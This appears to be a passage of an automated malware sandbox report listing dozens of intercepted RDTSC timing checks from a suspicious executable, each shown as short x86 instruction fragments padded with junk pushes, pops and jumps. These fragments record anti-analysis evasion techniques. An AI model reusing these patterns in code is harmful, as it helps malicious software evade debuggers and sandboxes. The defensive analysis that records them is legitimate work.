Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EE380 second address: 2EE384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EE384 second address: 2EE3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8765238CC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F8765238CCEh 0x00000012 jmp 00007F8765238CD8h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EE3B9 second address: 2EE3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EE3BF second address: 2EE3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EE3C4 second address: 2EE3CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EE3CC second address: 2EE3DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8765238CC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EDA27 second address: 2EDA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EDA2B second address: 2EDA2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EDA2F second address: 2EDA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EDEB5 second address: 2EDEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EDEBB second address: 2EDEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EDEC2 second address: 2EDEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EDEC8 second address: 2EDECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EDECE second address: 2EDED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EDED3 second address: 2EDEE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8764C3B8C0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F8D51 second address: 2F8D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8765238CC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F8D5B second address: 2F8D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F8D5F second address: 2F8D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F8EB7 second address: 2F8EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F8EC1 second address: 2F8ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8765238CCEh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F8ED6 second address: 2F8EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F9049 second address: 2F904D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F904D second address: 2F9076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8764C3B8BAh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F9076 second address: 2F907B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2F907B second address: 2F908D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8764C3B8BAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2FE47E second address: 2FE488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8765238CC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2FDA5E second address: 2FDA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F8764C3B8BDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2FDA73 second address: 2FDA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2FDA79 second address: 2FDA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2FDA80 second address: 2FDA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2FEA3D second address: 2FEA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2FEA46 second address: 2FEA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2FEA4A second address: 2FEA54 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8764C3B8B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2FEA54 second address: 2FEA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 304E76 second address: 304E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 304E80 second address: 304E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 304E86 second address: 304EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 jmp 00007F8764C3B8C6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8764C3B8C2h 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 303CBD second address: 303CD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F8765238CC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d jnp 00007F8765238CDAh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C97CC second address: 2B2004 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8764C3B8C7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F8764C3B8B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 call dword ptr [ebp+122D2D87h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 push eax 0x00000031 pop eax 0x00000032 pop edx 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C9C4C second address: 2C9C56 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8765238CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C9DF8 second address: 2C9E79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007F8764C3B8C5h 0x00000014 jno 00007F8764C3B8BCh 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e pushad 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 pushad 0x00000025 jbe 00007F8764C3B8B6h 0x0000002b jmp 00007F8764C3B8C8h 0x00000030 popad 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F8764C3B8C8h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C9E79 second address: 2C9E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C9E7D second address: 2C9E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop eax 0x00000008 push 1D2F1B2Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F8764C3B8BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C9E94 second address: 2C9E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CA2A9 second address: 2CA2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CA2AE second address: 2CA2B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CA5BE second address: 2CA5CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CA5CD second address: 2CA5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CA5D1 second address: 2CA5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CA794 second address: 2CA7A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CA7A9 second address: 2CA7BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8764C3B8BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CAA40 second address: 2CAA54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8765238CD0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CAA54 second address: 2CAA6B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8764C3B8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F8764C3B8B8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CAA6B second address: 2CAAD7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a add dword ptr [ebp+122D1F89h], esi 0x00000010 popad 0x00000011 lea eax, dword ptr [ebp+1247E4FDh] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F8765238CC8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 jo 00007F8765238CC8h 0x00000037 mov dh, A6h 0x00000039 movzx edx, si 0x0000003c or edi, dword ptr [ebp+122D2CC1h] 0x00000042 nop 0x00000043 pushad 0x00000044 push ecx 0x00000045 jbe 00007F8765238CC6h 0x0000004b pop ecx 0x0000004c jmp 00007F8765238CD8h 0x00000051 popad 0x00000052 push eax 0x00000053 push edi 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CAAD7 second address: 2B2B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8764C3B8B6h 0x0000000a popad 0x0000000b pop edi 0x0000000c nop 0x0000000d sub edx, dword ptr [ebp+122D2961h] 0x00000013 call dword ptr [ebp+1244F966h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F8764C3B8CFh 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B2B5C second address: 2B2B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30415F second address: 304175 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8764C3B8B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F8764C3B8B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 304175 second address: 30417E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30417E second address: 304186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 304186 second address: 304191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30453E second address: 304546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 304546 second address: 304552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3046BA second address: 3046E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8764C3B8BCh 0x00000012 jmp 00007F8764C3B8C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 307AC0 second address: 307ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F8765238CD6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 307ADF second address: 307AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30B04E second address: 30B058 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8765238CDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 310A85 second address: 310A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 310A89 second address: 310A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 310A8D second address: 310A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 310A93 second address: 310A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2831AB second address: 2831D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8764C3B8BCh 0x00000009 popad 0x0000000a pop edx 0x0000000b push edi 0x0000000c jmp 00007F8764C3B8BAh 0x00000011 jc 00007F8764C3B8BCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30F5F9 second address: 30F609 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8765238CCAh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30FBE7 second address: 30FBF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F8764C3B8B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30FBF2 second address: 30FBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30FBFA second address: 30FC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30FC03 second address: 30FC15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30FC15 second address: 30FC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F8764C3B8BCh 0x00000010 jne 00007F8764C3B8B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30FC2B second address: 30FC44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8765238CD3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30FC44 second address: 30FC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30FDAA second address: 30FDB4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8765238CD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 30FDB4 second address: 30FDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8764C3B8B6h 0x0000000a jl 00007F8764C3B8BEh 0x00000010 jne 00007F8764C3B8B6h 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F8764C3B8D1h 0x00000020 pushad 0x00000021 jmp 00007F8764C3B8C1h 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3100A7 second address: 3100C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD6h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3100C4 second address: 3100FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnc 00007F8764C3B8D4h 0x0000000e jmp 00007F8764C3B8BAh 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3104CE second address: 31050E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jno 00007F8765238CCEh 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8765238CD6h 0x00000015 jmp 00007F8765238CD2h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3108F9 second address: 31091B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8764C3B8B6h 0x00000008 jmp 00007F8764C3B8BCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jg 00007F8764C3B8B6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 31091B second address: 310937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F8765238CD3h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
